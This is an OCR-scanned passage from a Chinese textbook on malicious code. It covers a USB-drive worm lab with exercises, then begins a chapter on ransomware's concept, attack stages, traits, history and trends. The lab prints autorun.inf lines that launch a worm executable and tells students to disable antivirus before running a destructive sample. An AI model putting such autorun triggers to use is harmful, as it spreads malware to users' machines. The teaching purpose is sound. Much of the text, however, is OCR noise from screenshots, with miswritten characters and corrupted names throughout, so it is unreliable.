国 国 回国 国 屠 国 国 国 国 国 国 加 回国 加 加 
bg 
国 国 回国 国 睹 国 国 国 加 国 国 名 回国 加 加 
mr st 关 E2 全 "A 0 再 二 | 
Be 


* 米 来 半 玉 玉 入 玉 加 加 回回 加 回回 加 回回 加 
来 玉 玉环 于 米国 国 国 回国 国 因 回国 回国 回 吉 


求 来 来 半 求 来 宗 求 


ph jk tk 
ADD 
ho ho 避 


让 世 


Documents Inetpub Program Files ‘WINDOYWYS 
and Settings 


选 定 项 目 可 以 查看 其 说 明 。 


总 计 ; 7,98 GB 
园 已 用 空间 ; 1.43 GB 


(a) 下 载 是 


EE 


文件 (FE) ”编辑 (E) ”查看 (WW) 收藏 (入 ”工具 (了 帮助 (H) 
和 启明 - 路 - 国 | 我 搜索 号 文 件 夹 凶 历 史 | 及 呈 | 国 - 
地 址 (D) | 所 本 地 磁盘 (C:) | 他 转 
司 国 针 时 
Documents Inetpub Program Files ‘WINDOWYS 
and Settings 


选 定 项 目 可 以 查看 其 说 明 。 


总 计 ; 7.98 GB 
国 已 用 室 间 ; 1.43 GB 


(b) 下 载 后 
图 7-6 自动 下 载 文件 前 后 状态 对 比 
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7.5 综合 实验 


综合 实验 八 : 基于 UU 盘 传播 的 蠕虫 实验 


【实验 目的 】 
理解 U 盘 蠕虫 病毒 的 传染 原理 。 
【实验 环境 】 


(1) VMWare Workstation 5. 5.3。 

(2) Windows XP sp2 。 

【病毒 原理 了 】 

U 盘 病毒 通常 都 是 通过 给 U 盘 创 建 autorun. inf 文件 ,利用 Windows 系统 的 自动 播放 
功能 来 触发 病毒 程序 ,从 而 达到 传染 和 破坏 的 目的 。 

autorun. inf 文件 可 以 通过 以 下 命令 来 运行 病毒 程序 。 


Open = Virus. exe 
指定 设备 启用 时 运行 Virus. exe。 
ShellExecute = Virus. exe 

设备 启用 时 执行 文件 Virus. exe。 


Shell\XXX\command = Virus. exe 


当 用 户 在 右键 亲 单 中 选择 X XX 时 ,运行 Virus. exe。 

【实验 步骤 】 

(1) 实验 取材 ; 在 本 书 配套 素材 目录 experments\wormu 下 。 

(2) 检查 干净 的 计算 机 各 分 区 是 否 存 在 autorun. inf 和 病毒 文件 virus. exe( 需 要 设置 显 
示 隐 藏 文件 和 系统 文件 等 选项 ) 。 

(3) 插入 含有 病毒 的 U 盘 ,U 盘 的 右键 菜单 出 现 “auto” 后 ,双击 U 盘 , 观 察 各 分 区 的 情 
况 ( 图 7-7) 。 

(4) 查看 autorun. inf 文件 内 容 。 基 内容 如 下 。 


[AutoRun ] 

open = uvirus. exe 

shellexecute = uvirus. exe 
shell\auto\command = uvirus. exe 


(5) 观察 病毒 触发 后 的 效果 ,如 图 7-8 所 示 。 

(6) 插入 干净 的 U 盘 , 观 察 U 盘 是 否 被 感染 。 

【实验 注意 事项 】 

(1) 实验 前 ,请 关闭 杀毒 软件 。 否 则 病毒 样本 会 被 自动 杀 除 。 

(2) 请 注意 操作 系统 的 版 本 。Windows XP Sp2 及 以 下 版 本 都 适用 。 

(3) 本 病毒 程序 用 于 实验 目的 ,请 妥善 使 用 。 

(4) 本 病毒 程序 具有 一 定 的 破坏 力 ,做 实验 时 注意 安全 ,推荐 使 用 虚拟 机 环境 。 
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文件 于) ”编辑 区 ) 查看 上 ) 收藏 由 工具) 帮助 加) 


信 提 -如 - 访 | 有 拉 及 站 天 | 国 - 


地 址 0) |< FE:\ 


文件 和 文件 夹 任 务 


加 创建 一 个 新 文件 夹 
«a 将 达 个 文件 夹 发 和 到 
e 


司 共享 此 文件 夹 


7-7 UD 盘 蠕 虫 病毒 已 经 感染 


文件 于 ) 编辑 EF) ”查看 (W) 收 蔬 和 让) 工具 (CI) 帮助 册 


国良 :图 : 序 上 万 准 肪 文 4 关 国 - 


地 址 00) | < 了 


文件 和 文件 来 任务 。“^) 首 |e 3 加 i 
1 EP 

国 重 命名 这 个 文件 

房 移 和 这 个 文件 

四 复制 这 个 六 件 

仿 将 这 个 文件 发 布 到 Ye 
加 以 直子 邮 人 形式 办 此 
XK 出 除 这 个 文件 


play a gamez[6] 


创建 日 期 : 2010-10-17 22:24 大 小 : 164 了 王 


(a) 病毒 执行 提示 


7-8 UVU 盘 蠕虫 病毒 执行 
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(b) 病毒 开始 运行 
图 7-8 ( 续 ) 
7.6 习 题 
一 、 填空 题 
蠕虫 病毒 的 主 程序 中 含有 传播 模块 ,传播 模块 的 和 人 侵 可 以 分 为 
和 3 个 步骤 ,以 实现 蠕虫 病毒 的 主动 入 侵 。 
二 、 选 择 题 
1. 下 列 计算 机 病毒 不 是 蠕虫 病毒 的 是 ( 
A. 冲击 波 B. 振荡 波 C. CIH D. 尼 姆 达 
2. 蠕虫 和 传统 计算 机 病毒 的 区 别 主要 体现 在 ( es 
A. 存在 形式 B. 传染 机 制 C. 传染 目标 D. 破坏 方式 
三 、 思 考题 


1. 蠕虫 的 破坏 威力 是 非常 大 的 ,论述 蠕虫 病毒 的 破坏 主要 体现 在 哪些 方面 。 

2. 第 一 个 蠕虫 病毒 在 20 世纪 80 年 代 就 问世 了 , 试 分 析 为 什么 近 几 年 才 体会 到 这 种 病 
毒 的 破坏 威力 。 

四 、 实 操 题 

掌握 基于 U 盘 传 播 的 蠕虫 原理 ,并 执行 其 实验 步骤 。 


第 8 和 卫 蔓 案 型 恶意 代码 


从 2013 年 开始 ,不 法 人 员 借 助 恶 意 代 码 或 者 黑客 手段 牟取 非法 利润 的 事件 屡屡 发 生 ， 
勒索 型 恶意 代码 是 这 类 手段 的 典型 代表 ,并 过 渐 发 展 成 黑客 动 持 用 户 设备 或 资产 的 常见 手 
段 之 一 。 近 年 来 ,勒索 攻击 事件 频 发 ,造成 了 巨大 的 经 济 损失 ,2016 年 平均 单 笔 勒 索 金 额 高 
达 1077 美元 (Symantec 的 数据 )。2016 年 以 来 ,网 络 勒 索 攻 击 变 得 更 加 多 样 化 和 专业 化 ， 
大 量 的 专业 黑客 参与 其 中 。 

2013 年 至 今 ,勒索 型 恶意 代码 肆虐 横行 ,勒索 攻击 事件 愈演愈烈 。 从 PC 到 企业 服务 
希 , 从 Windows 平台 到 安 早 智能 终端 ,甚至 一 度 自 称 非 常安 全 的 Mac OS X 也 遭受 勒索 型 
恶意 代码 的 人 危害。 勒索 型 恶意 代码 成 为 主要 网 络 安全 威胁 之 一 。 

第 一 个 真正 意义 的 勒索 型 恶意 代码 GPCoder 在 2005 年 出 现 , 其 将 用 户 计算 机 上 的 特 
定 类 型 文件 加 密 ,并 提示 用 户 联系 指定 的 邮箱 ,通过 购买 密 钥 来 解密 文件 。 近 两 年 ,勒索 型 
恶意 代码 愈 发 猩 狐 ,所 带 来 的 社会 影响 和 经 济 损失 也 备 受 关注 。 勒 过 型 恶意 代码 是 近年 数 
量 增加 最 快 的 安全 威胁 之 一 ,黑客 通 稼 为 隐藏 踪迹 而 要 求 用 户 以 电子 货币 方式 文 付 赎金 ,以 
换取 解密 计算 机 数据 所 需 电子 " 密 钥 ”。 

章 对 勒索 型 恶意 代码 的 基本 概念 ,特性 、 源 代码 分 析 、 代 码 实 践 、 防 范 以 及 应 对 策略 进 
行 分 析 和 讲解 。 

本 章 学 习 目 标 

(1) 掌握 勒索 型 恶意 代码 的 概念 。 

(2) 掌握 勒索 型 恶意 代码 的 原理 。 

(3) 了 解 勒 索 型 恶意 代码 的 危害 。 

(4) 掌握 勒索 型 恶意 代码 的 防范 技术 。 


8.1 蔓 索 型 恶意 代码 概述 


勒索 型 恶意 代码 是 一 种 以 勒索 为 目的 的 恶意 软件 一 一 黑客 使 用 技术 手段 劫持 用 户 设备 
或 数据 资产 ,并 以 此 为 条 件 各 用 户 勒 案 钱 财 的 一 种 恶意 攻击 手段 。 

勒 索 软件 (Ransomware) 是 典型 的 勒索 型 恶意 代码 ,通过 骚扰 ,中 吓 甚至 采用 绑架 用 户 
文件 等 方式 ,使 用 户 数据 资产 或 计算 资源 无 法 正 稼 使 用 ,并 以 此 为 条 件 回 用 户 勒 索 钱 财 。 这 
类 用 户 数据 资产 包括 文档 .邮件 数据库、 源 代 码 . 图片. 压缩 文件 等 多 种 文件 。 赎 金 形式 包 
括 真 实 货 币 .比特 币 或 其 他 虚拟 任 

勒索 软件 有 两 种 形式 , 即 数 据 加 密 和 限制 访问 。 数 据 加 密 是 勒索 软件 最 第 见 的 形式 。 
在 这 种 形势 下 ,勒索 软件 将 受害 者 机 天 上 的 数据 加 密 ,并 有 承 族 受 害 者 缴纳 赎金 后 会 协助 其 将 
数据 恢复 。 另 一 种 形式 是 限制 访问 , 相 比 之 下 ,这 种 形式 不 影 啊 存 储 在 设备 上 的 数据 。 相 
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反 , 它 们 阻挠 受害 者 访问 设备 (例如 , 安 早 上 的 DoubleLocker 就 会 强制 锁 屏 ,使 用 户 无 法 使 
用 手机 ) , 回 受 害 者 索要 赎金 ,并 显示 在 屏 奔 上。 勒索 软件 通 第 会 伪装 成 权利 部 门 的 通知 , 报 
告 受害 人 非法 访问 了 网 页 内 容 , 并 说 明 他 们 必须 支付 罚款。 


8.1.1 全 球 勒 索 型 恶意 代码 


据 Symantec 2017 年 的 报告 ,2016 年 , 防 病毒 软件 每 月 检测 到 的 勒索 软件 数量 呈现 小 
幅 增长 ,从 年 初 的 将 近 35 000 个 增 至 年 末 的 40 000 个 以 上 。 

2016 年 新 型 勒索 软件 家 族 种 类 增长 明显 。 勒 索 软 件 家 族 在 2014 年 和 2015 年 分 别 新 
增 30 种 ,2016 年 却 暴涨 3 倍 多 ,达到 101 种 。 这 种 趋势 表明 越 来 越 多 的 攻击 者 看 到 这 种 恶 
意 代 码 的 获 利 功能 ,不 断 编 写 新 型 勒索 软件 或 修改 现 有 勒索 软件 (图 8-1(a) ) 。 

勒索 软件 变 体 数量 ( 即 勒索 软件 家 族 的 不 同 变 体 ) 同 比 下 降 29% ,从 2015 年 的 342 000 
个 降 至 2016 年 的 241 000 个 。 这 种 下 滑 趋势 从 月 度 新 型 勒索 软件 变 体 数量 中 可 见 一 斑 , 这 
个 平均 数量 从 2016 年 1 月 的 20 000 之 多 减少 到 年 底 的 不 足 20 000 个 。 新 型 勒索 软件 变 体 
数量 是 反映 勒索 软件 活动 总 量 的 一 个 指标 ,说 明 攻 击 者 为 了 躲避 检测 而 不 断 改进 勒索 软件 。 
结合 2016 年 新 型 勒索 软件 家 族 的 大 幅 增 加 来 看 , 变 体 数量 的 下 清 也 能 说 得 通 。 这 表明 ,更 
多 的 攻击 者 正 选 择 从 零 开 始 编写 新 型 勒索 软件 家 族 , 而 不 是 微调 现 有 的 勒索 软件 变 体 
(图 8-1(b) ) 。 
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8.1.2 勒索 型 恶意 代码 的 攻击 阶段 


勒索 攻击 一 般 分 为 3 个 阶段 ,其 中 包括 传播 感染 阶段 .本 地 攻击 阶段 .勒索 文 付 阶段 。 

(1) 传播 感染 阶段 : 传播 阶段 的 技术 和 大 多 数 恶 意 代 码 没 区 别 ,主要 也 是 通过 电子 邮 
件 、 网 站 、U 盘 等 介质 将 恶意 程序 传输 到 目标 主机 上 ,并 伺机 执行 。 

(2) 本 地 攻击 阶段 : 勒索 型 恶意 代码 在 获得 运行 机 会 后 ,按照 恶意 代码 设 定 的 文件 类 型 
列表 对 用 户 磁 盘 内 的 文件 系统 进行 扫描 ,并 对 能 够 处 理 的 文件 类 型 .磁盘 区 块 或 数据 库 进 行 加 
密 , 甚 至 将 用 户 的 设备 锁定 ,主要 目的 是 使 用 户 不 能 如 平 稼 一样 正常 使 用 设备 或 谈 取 文件 。 

(3) 勒索 支付 阶段 : 在 被 攻击 的 计算 机 或 智能 终端 等 设备 上 留 下 勒索 信息 ,迫使 受害 
者 通过 勒索 信息 按照 攻击 者 的 支付 方式 要 求 来 进行 交付 赎金 ,也 就 是 购买 被 加 密 文 件 的 解 
密 密 钥 或 被 锁定 设备 的 解锁 口令 。 
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8.1.3 勒索 型 恶意 代码 的 特性 


与 其 他 恶意 代码 相 比较 ,勒索 型 恶意 代码 的 显著 特性 就 是 勒索, 因此 它 需 要 带 有 一 个 能 
匿名 文 付 赎 金 的 模块 。 除 此 之 外 的 特性 就 和 其 他 恶意 代码 有 些 类 似 了 。 
1. 传播 方式 多 样 化 


勒索 型 恶意 代码 的 传播 方式 多 种 多 样 ,概括 为 如 下 几 种 。 其 中 ,最 常见 的 3 种 攻击 方式 
包括 网 页 挂 载 传 播 .邮件 附件 .漏洞 攻击 。 

(1) 钓鱼 邮件 。 攻 击 者 在 进行 病毒 传播 时 ,利用 社会 工程 学 手段 来 增加 可 信和 度 , 如 在 邮 
件 中 加 入 对 于 目标 用 户 的 身份 信息 ,并 通过 传输 文档 来 增加 用 户 对 于 附件 的 信任 度 ,并 且 利 
用 恶意 宏 代 码 进行 攻击 。 

(2) 水 坑 攻 击 。 在 网 页 中 注入 勒索 型 恶意 代码 ,浏览 该 网 站 的 人 和 群 可 能 会 被 勒索 型 恶 
意 代 码 所 感染 ,从 而 造成 大 规模 的 影响 。 

(3) 漏洞 攻击 。 利 用 服务 需 的 漏洞 来 攻击 服务 需 文 件 , 从 而 造成 较 大 的 影响 ,获取 较 高 
的 利润 。 以 XTBL 家 族 为 代表 的 敲诈 者 病毒 主要 采用 此 类 攻击 方式 。 

(4) 捆绑 传播 。 与 其 他 恶意 软件 捆绑 传播 ,利用 其 他 恶意 代码 的 传播 能 力 , 把 勒索 型 恶 
意 代 码 传播 出 去 。 

(5) 僵尸 网 络 传播 。 一 方面 僵尸 网 络 可 以 发 送 大 量 的 垃圾 邮件 , 另 一 方面 僵尸 网 络 为 
勒索 软件 即 服务 (RaaS) 的 发 展 起 到 了 支撑 作用 。 

(6) 可 移动 存储 介质 、 本 地 和 远程 的 驱动 右 传 播 。 恶 意 软 件 会 自我 复制 到 所 有 本 地 了 豫 
动 器 的 根 目 录 中 ,并 成 为 具有 隐藏 属性 和 系统 属性 的 可 执行 文件 。 

(7) 文件 共享 网 站 传播 。 勒 索 软 件 存储 在 一 些小 众 的 文件 共享 网 站 ,等待 用 户 点 击 链 
接 下 载 文件 。 

(8) 网 页 挂 载 传播 。 攻 击 者 把 勒索 软件 挂 载 在 某 些 网 站 上 。 当 用 户 不 小 心 访问 恶意 网 
站 时 ,勒索 软件 会 被 浏览 器 自动 下 载 并 在 后 台 运 行 。 

(9) 社交 网 络 传播 。 勒 索 软 件 以 社交 网 络 中 的 .jpg 图 片 或 者 其 他 恶意 文件 载体 传播 。 

2. 攻击 平台 多 样 化 


虽然 Windows 用 户 仍 是 勒索 软件 的 主要 攻击 目标 ,但 是 瞄准 其 他 平台 的 勒索 软件 攻击 
活动 也 在 与 日 俱 增 。 巾 于 各 种 恶意 代码 编制 团伙 都 在 争 相 寻找 未 被 利用 的 目标 群体 ,因此 
这 种 攻击 大 有 愈演愈烈 的 趋势 。 

(1) Windows 平台 。 漫 无 目的 地 袭击 企业 和 个 人 用 户 的 大 规模 攻击 活动 是 当前 勒索 软 
件 攻击 的 最 突出 形态 。 大 部 分 攻击 团伙 都 只 想 感染 尽 可 能 多 的 计算 机 ,试图 狠 狠 地 大 捞 一 
笔 。 因 此 ,大 多 数 勒 索 软 件 变 体 都 意图 攻击 Windows 计算 机 ,这 导致 Windows 家 庭 用 户 仍 
是 最 大 受害 群体 之 一 。 与 企业 相 比 ,家 庭 用 户 使 用 的 安全 软件 的 质量 、 使 用 方法 都 有 所 从 
缺 ,因此 他 们 的 计算 机 更 易 遭 受 攻 击 。 尽 管家 庭 用 户 未必 会 文 付 高 额 赎金 ,但 是 潜在 受害 者 
的 庞大 数量 意味 着 犯罪 分 子 仍 可 从 中 牟取 上 暴利。 当然 ,攻击 家 庭 用 户 的 勒索 软件 同样 也 会 
对 企业 发 起 攻击 。 

(2) 安 卓 平台 。 随 着 智能 手机 的 普及 ,这 些 设备 自然 而 然 引 来 了 勒索 软件 攻击 者 的 关 
注 。 近 几 年 涌现 出 大 量 的 针对 Android 平台 的 威胁 ,其 中 绝 大 多 数 是 勒索 型 威胁 。2014 年 
4 月 ,知名 的 勒索 型 恶意 代码 Koler 就 是 针对 安 卓 平台 的 恶意 代码 。 

(3) Mac OS X。2016 年 3 月 ,KeRanger (OSX. Keranger) 威胁 成 为 第 一 个 针对 Mac 
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OS X 操作 系统 的 勒索 软件 。KeRanger 主要 在 Transmission BitTorrent 客户 端的 受 感染 
版 本 安装 程序 中 传播 。 

(4) Linux 系统 平台 。Linux 系列 的 操作 系统 也 有 庞大 的 用 户 群 ,很 显然 ,勒索 型 恶意 
代码 的 作者 也 不 会 忘掉 Linux 平台 。2015 年 11 月 ,勒索 型 恶意 代码 Linux. Encoder. 1 针 
对 Linux 的 Web 服务 器 进行 攻击 。 

(5) 物 联网 设备 。 各 类 物 联网 设备 连接 互联 网 ,但 是 在 安全 防护 上 还 是 存在 许多 安全 
漏洞 ,因此 也 非常 容易 成 为 勒索 攻击 的 目标 。 

3. 本 地 攻击 手段 多 变 

(1) 加 密 数 据 库 新 型 勒索 攻击 。2015 年 有 一 种 名 为 RansomWeb 的 新 型 加 密 勒 索 , 专 
门 入 侵 网 络 服务 硕 ,修改 Web 谈 写 数据 库 程 序 , 在 存 人 数据 时 进行 透明 加 密 ,在 读 取 数据 时 
进行 透明 解密 ,并 且 只 对 关键 的 数据 库 表 进行 加 解密 ,而 在 一 定时 间 后 再 次 停止 解密 程序 。 
在 这 过 程 中 , 既 不 引起 管理 员 对 于 数据 库 异 稼 的 注意 ,也 达到 了 对 于 大 量 数据 加 密 的 目的 。 

(2) 加 密 磁 盘 型 勒索 攻击 。2016 年 3 月 出 现 的 勒索 型 恶意 代码 Petya 不 仅 对 于 计算 机 
数据 加 密 ,还 对 硬盘 驱动 器 的 主 引 导 记 录 (MBR) 进 行 了 加 密 , 导 致 感染 的 计算 机 无 法 启动 

(3) 新 型 勒索 病毒 攻击 方法 。 随 着 勒索 病毒 的 发 展 , 未 来 会 存在 许多 高 级 攻击 手段 。 
例如 ,把 勒索 代码 写 入 固件 ,即使 重 装 系 统 也 无 法 清除 威胁 。 

4. 支付 方式 隐秘 


早期 的 勒索 型 恶意 代码 使 用 邮箱 或 账户 转账 的 方式 文 付 赎金 ,而 如 今 , 改 用 比特 币 文 
付 。 其 中 比特 币 的 匿名 性 和 不 可 济源 性 增强 了 攻击 者 的 隐秘 性 。 站 在 隐蔽 支付 的 角度 来 考 
察 勒 索 型 病毒 ,会 发 现 比特 币 是 促进 勒索 型 恶意 代码 竹 勃 发 展 的 重要 推手 。 如 果 没 有 比特 
币 出 现 ,勒索 组 织 不 敢 明目张胆 地 收取 赎金 。 


8.1.4 勒索 型 恶意 代码 出 现 的 原因 


勒 宗 型 恶意 代码 所 能 创造 的 利润 极 高 ,攻击 者 仅 需 通过 一 定 的 手段 传播 勒索 型 恶意 代 
码 ,造成 一 部 分 目标 机 融 感 染 勒 索 病 毒 , 就 能 获取 非常 高 的 利润 。 勒 索 型 恶意 代码 的 成 本 
低 , 且 回报 高 , 且 比 特 币 支付 的 匿名 和 不 可 溯源 增长 了 勒索 型 恶意 代码 发 展 的 态势 。 随 着 传 
播 方 式 的 改进 和 加 密 方式 的 花样 百出 ,勒索 型 恶意 代码 所 市 来 的 危害 性 也 越 来 越 大 。 

造成 其 有 利 可 图 的 根本 原因 在 于 用 户 日 喘 不 注重 安全 防护 ,对 于 恶意 邮件 和 系统 漏洞 
等 没有 防护 意识 ,对 于 附件 和 链接 等 防范 心太 低 。 用 户 对 于 关键 数据 的 备份 率 过 低 ,也 是 造 
成 攻击 者 有 利 可 图 的 主要 原因 。 


8.2 勒索 型 恶意 代码 的 历史 与 现状 


8.2.1 勒索 型 恶意 代码 的 历史 


在 勒 案 型 恶意 代码 出 现 以 前 ,数据 丢失 大 多 只 是 恶意 代码 活动 的 附 市 危害 ,但 现在 情况 
发 生 了 变化 ,恶意 软件 与 破坏 数据 或 拒绝 访问 内 容 的 关联 变 得 前 所 未 有 的 直接 。 勒 索 型 恶 
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意 代 码 改变 了 这 一 传统 模式 ,从 破坏 系统 转 回 彻底 的 勒索 。 现 在 的 攻击 者 使 用 勒索 型 恶意 
代码 拒绝 人 们 访问 数据 或 系统 ,如 果 要 恢复 访问 , 则 需要 文 付 赎金 。 

勒索 型 恶意 代码 随 着 互联 网 和 技术 发 展 正 成 为 一 个 日 益 严 重 的 问题 。 企 业 通 篆 认 为 文 
付 赎 金 是 取 回 数据 最 划算 的 办 法 ,现实 情况 也 可 能 正 是 这 样 。 但 是 ,我 们 所 面临 的 问题 是 ， 
每 一 个 企业 为 了 取 回 其 文件 而 支付 的 赎金 ,会 直接 用 于 下 一 代 勒 索 型 恶意 代码 的 升级 和 开 
发 。 因 此 ,我们 看 到 勒索 型 恶意 代码 正 以 怀 人 的 速度 不 断 发 展 。 

1. 最 早 的 勒索 型 恶意 代码 

在 有 案 可 查 的 勒索 型 恶意 代码 中 ,最 早 的 实例 出 现在 1989 年 。 它 是 由 Joseph Poop 编 
写 的 ,在 发 作 时 会 用 对 称 加 密 算 法 加 密 被 攻击 者 系统 盘 上 的 所 有 文件 ,然后 要 求 被 攻击 者 给 
“PC Cyborg Corporation 账号 汇款 。 这 个 恶意 代码 的 作者 号 称 是 通过 这 种 方式 为 AIDS 研 
究 筹 集资 金 , 但 他 却 开创 了 勒索 型 恶意 代码 的 先河 。 

2. 采用 非 对 称 加 密 的 勒索 型 恶意 代码 

在 1996 年 ,针对 当时 称 为 “密码 病毒 学 ”( 即 出 于 恶意 目的 使 用 密码 ) 的 课题 ,出 现 了 相 
关 的 研究 文 草 。 人 研究 人 员 创 造 出 一 种 概念 验证 病毒 ,能 够 使 用 RSA 和 TEA 算法 对 文件 进 
行 加 密 , 同 时 拒绝 访问 用 于 加 密 文 件 的 密 钥 。 到 了 2005 年 ,各 种 勒索 型 恶意 代码 纷 至 朝来 ， 
例如 ,Krotten、Archiveus、GPCoder 等 。 在 上 面 提 及 的 恶意 软件 系列 中 ,GPCoder 是 最 令 人 
感 兴趣 的 ,因为 在 众多 的 勒索 型 恶意 代码 中 , 它 在 加 密 文件 时 使 用 的 是 1024 位 RSA 加 密 ， 
这 就 使 得 人 们 难以 通过 上 俊 力 破 解 的 方法 来 恢复 文件 。 

3. 国内 首 个 勒索 型 恶意 代码 

2006 年 出 现 的 Redplus 勒索 病毒 (Trojan/ Win32. Pluder) 是 国内 首 个 勒索 软件 。 该 病 
毒 会 隐藏 用 户 文 档 ,然后 弹出 窗口 要 求 用 户 将 赎金 汇 入 指定 银行 账号 。2007 年 ,出 现 了 另 
一 个 国产 勒索 软件 QiaoZhaz, 该 病毒 运行 后 会 弹出 “发 现 您 硬盘 内 曾 使 用 过 盗版 了 的 我 公 
司 软 件 , 所 以 将 您 部 分 文件 移动 到 锁定 了 的 硼 区 , 奇 要 解锁 将 文件 释放 ,请 电邮 
“liugongs19670519@yahoo. com. cn? 购 买 相应 软件 ”的 对 话 框 。 

4. 最 早出 现 的 Android 平台 勒索 病毒 

2014 年 4 月 下 名 ,勒索 型 恶意 代码 陆续 出 现在 以 Android 系统 为 代表 的 智能 移动 平台 
上 ,而 较 早 出 现 的 为 Koler 家 族 (Trojanl rog,sys,fraj/Android. Koler) 。 该 家 族 主 要 行为 
是 ,在 用 户 解锁 屏 及 运行 其 他 应 用 时 ,会 以 手机 用 户 非 法 浏览 色情 信息 为 由 ,反复 弹出 警告 
信息 ,提示 用 户 需 缴 罚款 ,从 而 向 用 户 勒索 高 额 赎金 。 

5. 最 早 的 Linux 平台 勒索 病毒 

恶意 代码 防范 软件 公司 Doctor Web 的 研究 人 员 发 现 了 一 种 新 的 勒索 型 恶意 代码 , 命 
名 为 Linux. Encoder. 1。 该 勒索 软件 是 针对 Linux 系统 的 恶意 软件 。 这 个 Linux 恶意 软件 
使 用 C 语言 编写 , 它 司 动 后 作为 一 个 守护 进程 来 加 密 数 据 , 以 及 从 系统 中 删除 原始 文件 ,使 
用 AES-CBC-128 对 文件 加 密 之 后 ,会 在 文件 尾部 加 上 . encrypted 扩展 名 。 

6. 最 具 规 模 的 勒索 型 恶意 代码 

在 2012 年 ,出 现 了 基于 ZeuS 和 CitadelReveton 木马 的 Reveton 恶意 代码 ,这 是 人 们 发 
现 的 第 一 个 大 规模 部 署 的 勒索 型 恶意 代码 。 此 恶意 代码 会 声称 其 代表 各 种 不 同 的 执法 部 
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门 。 受 害 者 的 系统 中 会 显示 一 份 通知 ,其 声称 某 个 执法 部 门 已 经 锁定 他 们 的 文件 ,受害 者 需 
要 缴纳 “罚金 ”才能 恢复 相关 的 文件 。Reveton 会 提示 用 户 购 买 现金 卡 或 比特 币 并 通过 网 站 
提交 相关 的 支付 信息 ,然后 才能 取 回 他 们 的 文件 。 

7. 传播 能 力 最 强 的 勒索 软件 

近年 来 ,勒索 型 恶意 代码 又 有 了 新 的 发 展 趋势 , 即 结合 蠕虫 的 传播 技术 。 如 前 面 的 草 节 
所 述 ,蠕虫 是 独立 的 恶意 程序 , 它 复制 目 身 ,利用 系统 或 应 用 程序 的 漏洞 或 设计 缺陷 传播 到 
其 他 计算 机 上 。 它 通常 在 感染 一 个 受害 者 后 ,将 日 已 复制 到 本 地 网 络 上 可 以 访问 的 每 台 计 
算 机 上 。 微 软 在 2016 年 5 月 发 现 首 个 可 以 从 一 台 计 算 机 传播 到 另外 一 台 计 算 机 的 勒索 型 
恶意 代码 “ZCryptor”。 一 旦 执行 ,“ZCryptor” 会 复制 一 些 文件 到 可 移动 驱动 右 , 确 保 勒 案 型 
恶意 代码 会 传输 到 下 一 人 台 主 机 。 

8. 感染 Mac OS 的 勒索 恶意 代码 

2016 年 3 月 ,KeRanger (OSX. Keranger) 成 为 第 一 个 针对 Mac OS 操作 系统 的 勒索 病 
毒 。 在 此 之 前 ,勒索 病毒 团伙 几乎 忽略 了 Mac OS 用 户 。KeRanger 主要 在 Transmission 
BitTorrent 客户 端的 受 感染 版 本 安装 程 序 中 进行 传播 。KeRanger 与 现代 Windows 勒索 软 
件 行为 基本 相似 , 它 先 搜索 和 加 密 近 300 种 文件 类 型 ,然后 索要 1 比特 币 的 赎金 。 该 恶意 代 
人 码 经 有 效 Mac 开发 人 员 ID 签名 。 这 意味 着 KeRanger 可 以 绕 过 Mac OS 的 Gatekeepe 功 
能 ,因此 不 会 被 当 作 是 来 自 不 受信 任 源 的 软件 而 遭 到 拦截 。 随 后 ,Apple 迅速 撤销 了 
KeRanger 使 用 的 开发 人 员 ID。 在 此 之 前 ,2015 年 11 月 ,巴西 网 络 安全 研究 员 Rafael Salema 
Marques 开发 了 称 为 Mabouia (OSX. Ransomcrypt) 的 概念 验证 (PoC) 勒 索 病 毒 。Marques 
此 举 旨 在 强调 Mac OS 计算 机 未 必 能 够 抵御 勒索 软件 。 

9. 可 感染 工控 设备 的 勒索 软件 

在 2017 年 旧金山 RSA 大 会 上 ,乔治 亚 理工 学 院 的 研究 员 向 人 们 展示 了 一 种 可 以 感染 
工控 设施 , 回 系 统 传播 的 勒索 软件 ,名 为 LogicLocker。 它 可 以 改变 可 编程 逻辑 控制 天 
(PLCs) ,也 就 是 控制 关键 工业 控制 系统 (ICS) 和 监控 及 数据 采集 (SCADA) 的 基础 设施 。 通 
过 LogicLocker, 可 以 关闭 阀门 ,控制 水 中 所 的 含量 并 在 机 兹 面板 上 显示 错误 的 读数 。 


8.2.2 技术 发 展 趋势 


1. 攻击 量 逐 年 增长 

据 国外 安全 机 构 的 统计 数据 : 自 2015 年 以 来 ,勒索 型 恶意 代码 在 全 球 的 攻击 量 狗 长 了 
3 倍 , 平 均 每 40s 就 有 一 家 企业 被 感染 ; 平均 每 10s 就 有 一 个 无 辜 者 中 招 。 在 2015 年 仅 一 
个 病毒 家 族 CryptoWall 获取 的 赎金 就 高 达 3. 25 亿美 元 ,如 今 全 球 肆 虐 着 超过 75 种 这 样 的 
病毒 家 族 ,该 病毒 涉及 的 黑色 产业 已 经 成 长 为 一 个 数 十 亿美 元 的 市 场 。 

2. 攻击 趋势 向 国内 蔓延 

2016 年 全 国 至 少 有 497 万 多 台 计 算 机 遭遇 了 勒索 型 恶意 代码 的 攻击 ,并 于 2016 年 下 
半年 达到 高 峰 。 该 年 度 的 单 日 攻击 次 数 超 2 万 次 ,被 感染 者 已 经 遍布 全 国 所 有 省 份 , 广 东 被 
感染 计算 机 数量 最 高 , 占 全 国 被 感染 总 数 的 13. 2% ,其 次 是 江苏 9. 4% ,山东 5.8% ,北京 
“受灾 ”情况 较 低 ,但 也 有 约 16. 9 万 台 计 算 机 遭受 攻击 。 
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3. 攻击 者 “职业 素质 ” 愈 发 低下 

由 于 赎 回 文件 需要 国外 购买 比特 币 、Tor 浏览 器 等 国内 网 民 不 常 使 用 的 技术 ,再 加 上 前 
诈 者 反复 无 常 , 交 了 赎金 也 可 能 “ 撕 票 ”, 据 360 发 布 的 报告 显示 , 仅 16. 8% 的 受害 者 最 终 成 
功 恢复 了 数据 , 绝 大 多 数 (83.2%) 受 害 者 将 永远 失去 包括 办 公文 档 、 照 片 视频、 邮件 、 聊 天 
记录 等 重要 数据 。 

4. 攻击 者 技术 门槛 降低 

以 往 的 恶意 代码 拼 的 是 技术 , 谁 用 的 技术 新 .漏洞 危害 大 ,传播 得 就 广 ,恶意 代码 制作 者 
的 获 利 也 大 。 而 勒索 型 恶意 代码 是 将 有 几 十 年 历史 的 非 对 称 加 蜜 技术 ,十 几 年 历史 的 Tor 
技术 ,七 八 年 历史 的 比特 币 技术 等 进行 排列 组 合 ,形成 新 的 技术 模式 。 这 些 技术 难度 低 ,很 
容易 被 复制 学 习 。 

5. 传播 模式 “创新 ” 

敲诈 者 还 在 传播 模式 上 不 断 “ 创 新 ”。 之 前 国外 还 发 现 了 名 为 Popcorn Time 的 新 型 勒索 
